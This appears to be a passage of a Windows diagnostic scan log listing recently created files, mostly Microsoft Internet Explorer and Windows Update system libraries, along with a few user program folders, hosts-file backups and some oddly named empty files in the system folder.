2017-05-10 15:56 - 2017-04-20 01:16 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 02065408 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00876544 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00512000 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\oleres.dll
2017-05-10 15:56 - 2017-04-17 17:37 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\comcat.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 01417728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-10 15:56 - 2017-04-17 17:12 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleres.dll
2017-05-10 15:56 - 2017-04-17 16:54 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comcat.dll
2017-05-10 15:56 - 2017-04-16 11:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-05-10 15:56 - 2017-04-16 11:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-05-10 15:56 - 2017-04-16 10:57 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-05-10 15:56 - 2017-04-16 10:55 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-05-10 15:56 - 2017-04-16 10:55 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-05-10 15:56 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-10 15:56 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-10 15:56 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-10 15:56 - 2017-04-16 10:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-05-10 15:56 - 2017-04-16 10:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-05-10 15:56 - 2017-04-16 10:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-05-10 15:56 - 2017-04-16 10:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-05-10 15:56 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-10 15:56 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-10 15:56 - 2017-04-16 10:36 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-05-10 15:56 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-10 15:56 - 2017-04-16 10:25 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-05-10 15:56 - 2017-04-16 10:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-05-10 15:56 - 2017-04-16 10:19 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2017-05-10 15:56 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-10 15:56 - 2017-04-16 10:11 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-05-10 15:56 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-10 15:56 - 2017-04-16 10:09 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-05-10 15:56 - 2017-04-16 10:04 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-05-10 15:56 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-10 15:56 - 2017-04-16 10:02 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2017-05-10 15:56 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-05-10 15:56 - 2017-04-16 10:01 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2017-05-10 15:56 - 2017-04-16 10:01 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2017-05-10 15:56 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-10 15:56 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-10 15:56 - 2017-04-16 09:57 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-05-10 15:56 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-10 15:56 - 2017-04-16 09:52 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2017-05-10 15:56 - 2017-04-16 09:52 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2017-05-10 15:56 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-10 15:56 - 2017-04-16 09:48 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2017-05-10 15:56 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-10 15:56 - 2017-04-16 09:47 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2017-05-10 15:56 - 2017-04-16 09:46 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2017-05-10 15:56 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-10 15:56 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-10 15:56 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-10 15:56 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-10 15:56 - 2017-04-16 09:37 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-05-10 15:56 - 2017-04-16 09:35 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2017-05-10 15:56 - 2017-04-16 09:30 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2017-05-10 15:56 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-10 15:56 - 2017-04-16 09:28 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2017-05-10 15:56 - 2017-04-16 09:25 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2017-05-10 15:56 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-10 15:56 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-10 15:56 - 2017-04-16 09:20 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2017-05-10 15:56 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-10 15:56 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-10 15:56 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-10 15:56 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-10 15:56 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-10 15:56 - 2017-04-16 09:08 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2017-05-10 15:56 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-10 15:56 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-10 15:56 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-10 15:56 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-10 15:56 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-10 15:56 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-05-10 15:56 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 01483776 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2017-05-10 15:56 - 2017-04-12 17:32 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2017-05-10 15:56 - 2017-04-12 17:26 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2017-05-10 15:56 - 2017-04-12 17:25 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-05-10 15:56 - 2017-04-12 17:25 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2017-05-10 15:56 - 2017-04-12 17:25 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2017-05-10 15:56 - 2017-04-07 17:34 - 00986856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-10 15:56 - 2017-04-07 17:34 - 00265448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-10 15:56 - 2017-04-07 17:30 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-10 15:56 - 2017-04-07 17:30 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2017-05-10 15:56 - 2017-04-07 17:22 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-10 15:56 - 2017-04-05 16:55 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-10 15:56 - 2017-04-05 16:55 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-10 15:56 - 2017-04-05 16:55 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 01895656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 00377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 00287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2017-05-10 15:56 - 2017-04-04 16:53 - 00496128 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2017-05-10 15:56 - 2017-04-04 16:53 - 00117760 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2017-05-10 15:56 - 2017-03-10 18:32 - 01389056 _____ (Microsoft Corporation) C:\Windows\system32\pla.dll
2017-05-10 15:56 - 2017-03-10 18:32 - 00300544 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll
2017-05-10 15:56 - 2017-03-10 18:20 - 01508352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pla.dll
2017-05-10 15:56 - 2017-03-10 18:20 - 00237056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pdh.dll
2017-05-10 15:56 - 2017-03-10 17:57 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\plasrv.exe
2017-05-10 15:56 - 2017-03-10 17:55 - 00205312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2017-05-10 15:56 - 2017-03-10 17:55 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\exfat.sys
2017-05-10 15:56 - 2017-03-09 18:34 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-05-10 15:56 - 2017-03-09 18:19 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2017-05-03 14:36 - 2017-05-03 14:36 - 00000000 ____D C:\Program Files (x86)\IIS
2017-05-03 14:35 - 2017-05-03 14:35 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-01 09:36 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20170501-093603.backup
2017-04-29 16:43 - 2017-04-29 16:43 - 00001059 _____ C:\Users\Markus\Desktop\Eusing Free Registry Cleaner.lnk
2017-04-29 16:43 - 2017-04-29 16:43 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Eusing
2017-04-29 16:43 - 2017-04-29 16:43 - 00000000 ____D C:\Program Files (x86)\Eusing Free Registry Cleaner
2017-04-29 16:42 - 2017-04-29 16:42 - 00985017 _____ C:\Users\Markus\Downloads\EFRCSetup_4.0.exe
2017-04-28 14:29 - 2017-05-17 14:18 - 00000000 ____D C:\Users\Public\Documents\Google
2017-04-27 19:44 - 2017-05-21 19:34 - 00000000 ____D C:\Users\Markus\AppData\LocalLow\Mozilla
2017-04-27 19:39 - 2017-05-22 20:55 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Mozilla
2017-04-27 19:39 - 2017-04-27 19:49 - 00000000 ____D C:\Users\Markus\AppData\Local\Mozilla
2017-04-27 19:38 - 2017-04-27 19:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-27 17:42 - 2017-04-27 17:42 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bluetooth-Geräte
2017-04-27 16:44 - 2017-04-27 16:44 - 00000000 _____ C:\Windows\system32\__00000001400ACBF1__C0000005.dmp
2017-04-27 16:28 - 2017-04-27 16:28 - 00000000 ____D C:\Windows\system32\SSL
2017-04-27 16:28 - 2017-04-27 16:28 - 00000000 _____ C:\Windows\system32\__000000013FF6CBF1__C0000005.dmp
2017-04-26 19:27 - 2017-05-16 23:02 - 00000000 ____D C:\Users\Markus\AppData\Local\inst
2017-04-23 22:46 - 2017-04-23 22:46 - 00000000 ____D C:\Users\Markus\AppData\Local\{6C9E99E8-29C3-4435-A0EF-079701803673}
2017-04-23 13:28 - 2017-05-22 20:54 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-22 20:23 - 2017-04-22 20:23 - 01313544 _____ C:\Users\Alina\ElsterDruck_2.pdf
2017-04-22 20:06 - 2017-04-22 20:06 - 00522429 _____ C:\Users\Alina\Anmeldung Jg 5 GBE2.pdf
2017-04-22 18:27 - 2017-04-22 18:27 - 00000000 ____D C:\Users\Markus\AppData\Local\{140B0B5C-A1F5-4808-AD0D-2A1D5A214132}
2017-04-22 18:05 - 2017-04-22 18:05 - 00000005 _____ C:\Windows\SysWOW64\lMMLDeleteUserData42107612FX.tmp
2017-04-22 17:53 - 2017-04-22 17:53 - 00000000 ____D C:\Users\Markus\AppData\Local\{A5B0ABC6-5859-46DB-B69D-5F36B7D7E8EC}
2017-04-22 11:16 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20170422-111654.backup
2017-04-22 11:09 - 2017-04-22 11:09 - 00000000 ____D C:\Users\Markus\Documents\HTC
2017-04-21 16:43 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20170421-164340.backup
2017-04-21 11:29 - 2017-05-21 19:44 - 00000000 ____D C:\Windows\system32\log
2017-04-21 11:29 - 2017-05-03 14:34 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-21 11:29 - 2017-04-21 11:29 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-21 09:52 - 2017-04-21 09:52 - 00000000 ____D C:\Users\Markus\AppData\Local\{D1FF043E-E888-4F8C-890F-409848E25675}
2017-04-21 07:25 - 2017-05-21 08:53 - 00000000 ____D C:\Windows\Update
2017-04-21 07:25 - 2017-04-21 07:25 - 00000000 _____ C:\Windows\SysWOW64\44
2017-04-18 20:16 - 2017-04-18 20:16 - 00000000 ____D C:\Users\Markus\AppData\Local\{05D85A6E-197B-4AA5-9714-87540CF28916}
2017-04-17 17:24 - 2017-04-17 17:24 - 00000000 ____D C:\Users\Markus\AppData\Local\{5C1A77F1-1980-4D54-913B-4C307FC9F0F7}
2017-04-13 22:05 - 2017-04-13 22:05 - 00000000 ____D C:\Users\Markus\AppData\Local\{51F9A9AB-11B3-41B0-9F36-8E99D914D19C}
2017-04-12 16:34 - 2017-03-22 17:32 - 03165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-04-12 16:34 - 2017-03-22 17:32 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-04-12 16:34 - 2017-03-22 17:32 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-04-12 16:34 - 2017-03-22 17:30 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2017-04-12 16:34 - 2017-03-22 17:24 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2017-04-12 16:34 - 2017-03-22 17:17 - 02651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-04-12 16:34 - 2017-03-22 17:15 - 00709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-04-12 16:34 - 2017-03-22 17:15 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-04-12 16:34 - 2017-03-22 17:15 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2017-04-12 16:34 - 2017-03-22 17:15 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-04-12 16:34 - 2017-03-22 17:15 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2017-04-12 16:34 - 2017-03-22 17:15 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2017-04-12 16:34 - 2017-03-22 17:05 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2017-04-12 16:34 - 2017-03-22 17:05 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2017-04-12 16:34 - 2017-03-22 17:05 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2017-04-12 16:34 - 2017-03-22 17:05 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2017-04-12 16:34 - 2017-03-10 18:35 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-04-12 16:34 - 2017-03-10 18:31 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2017-04-12 16:34 - 2017-03-10 18:31 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-04-12 16:34 - 2017-03-10 18:31 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2017-04-12 16:34 - 2017-03-10 18:31 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2017-04-12 16:34 - 2017-03-10 18:27 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2017-04-12 16:34 - 2017-03-10 18:20 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2017-04-12 16:34 - 2017-03-10 18:19 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2017-04-12 16:34 - 2017-03-10 18:19 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2017-04-12 16:34 - 2017-03-10 17:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2017-04-12 16:34 - 2017-03-07 18:30 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2017-04-12 16:34 - 2017-03-07 18:17 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2017-04-12 16:34 - 2017-03-07 16:05 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2017-04-12 16:34 - 2017-03-04 03:27 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-04-12 16:34 - 2017-03-04 03:27 - 00093696 _____ (Microsoft Corporation) C:\Windows\system32\mfmjpegdec.dll
2017-04-12 16:34 - 2017-03-04 03:14 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-04-12 16:34 - 2017-03-04 03:14 - 00077312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmjpegdec.dll
2017-04-12 16:34 - 2017-02-14 18:33 - 00757248 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2017-04-12 16:34 - 2017-02-14 18:19 - 00497664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2017-04-12 16:34 - 2017-02-09 18:32 - 00769536 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2017-04-12 16:34 - 2017-02-09 18:32 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2017-04-12 16:34 - 2017-02-09 18:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:36 - 00011608 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-2-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l2-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll
